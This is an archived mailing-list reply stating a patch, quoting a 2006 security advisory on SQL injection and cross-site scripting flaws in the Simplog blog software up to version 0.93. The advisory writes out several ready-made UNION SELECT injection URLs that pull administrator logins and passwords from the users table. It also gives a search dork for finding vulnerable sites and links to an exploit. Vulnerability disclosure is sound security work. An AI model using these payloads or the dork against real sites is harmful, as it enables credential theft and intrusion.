<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7638.1">
<TITLE>RE: Advisory: Simplog &lt;= 0.93 Multiple Remote Vulnerabilities.</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>

<P><FONT SIZE=2>patched in version 0.9.3.1<BR>
<BR>
-----Original Message-----<BR>
From: Mustafa Can Bjorn IPEKCI [<A HREF="mailto:nukedx@nukedx.com">mailto:nukedx@nukedx.com</A>]<BR>
Sent: Fri 4/21/2006 2:54 PM<BR>
To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; support@simplog.org<BR>
Subject: Advisory: Simplog &lt;= 0.93 Multiple Remote Vulnerabilities.<BR>
<BR>
<BR>
--Security Report--<BR>
Advisory: Simplog &lt;= 0.93 Multiple Remote Vulnerabilities.<BR>
---<BR>
Author: Mustafa Can Bjorn &quot;nukedx a.k.a nuker&quot; IPEKCI<BR>
---<BR>
Date: 21/04/06 22:13 PM<BR>
---<BR>
Contacts:{<BR>
ICQ: 10072<BR>
MSN/Email: nukedx@nukedx.com<BR>
Web: <A HREF="http://www.nukedx.com">http://www.nukedx.com</A><BR>
}<BR>
---<BR>
Vendor: Simplog (<A HREF="http://www.simplog.org/">http://www.simplog.org/</A>)<BR>
Version: 0.93 and prior versions must be affected.<BR>
About: Via this methods remote attacker can inject arbitrary SQL queries to<BR>
tid parameter in preview.php,<BR>
cid,pid and eid in archive.php and pid in comments.php.As u know rgod was<BR>
published advisory about version 0.92 but he<BR>
did not notice this SQL injections. He found other SQL injections on<BR>
archive.php but did not found these vulnerabilities.<BR>
Also there is cross site scripting vulnerability in imagelist.php's imagedir<BR>
parameter.<BR>
Level: Critical<BR>
---<BR>
How&amp;Example:<BR>
SQL Injection :<BR>
Needs MySQL &gt; 4.0<BR>
GET -&gt; <A HREF="http://">http://</A>[victim]/[simplogdir]/preview.php?adm=tem&amp;blogid=1&amp;tid=[SQL]<BR>
GET -&gt; <A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;cid=[SQL]<BR>
GET -&gt; <A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;pid=[SQL]<BR>
GET -&gt; <A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;eid=[SQL]<BR>
EXAMPLE -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/preview.php?adm=tem&amp;blogid=1&amp;tid=-1/**/UNION/**/SELECT/**/<BR>
concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;cid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/archive.php?blogid=1&amp;eid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
EXAMPLE -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/comments.php?blogid=1&amp;pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,<BR>
password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*<BR>
with this examples remote attacker can leak speficied admins login<BR>
information from database.<BR>
<BR>
XSS:<BR>
GET -&gt;<BR>
<BR>
<A HREF="http://">http://</A>[victim]/[simplogdir]/imagelist.php?blogid=1&amp;act=add_entry&amp;login=1&amp;imagedir=[XSS]<BR>
<BR>
---<BR>
Timeline:<BR>
* 21/04/2006: Vulnerability found.<BR>
* 21/04/2006: Contacted with vendor and waiting reply.<BR>
---<BR>
Exploit:<BR>
<A HREF="http://www.nukedx.com/?getxpl=25">http://www.nukedx.com/?getxpl=25</A><BR>
---<BR>
Dorks: &quot;powered by simplog&quot;<BR>
---<BR>
Original advisory can be found at: <A HREF="http://www.nukedx.com/?viewdoc=25">http://www.nukedx.com/?viewdoc=25</A><BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>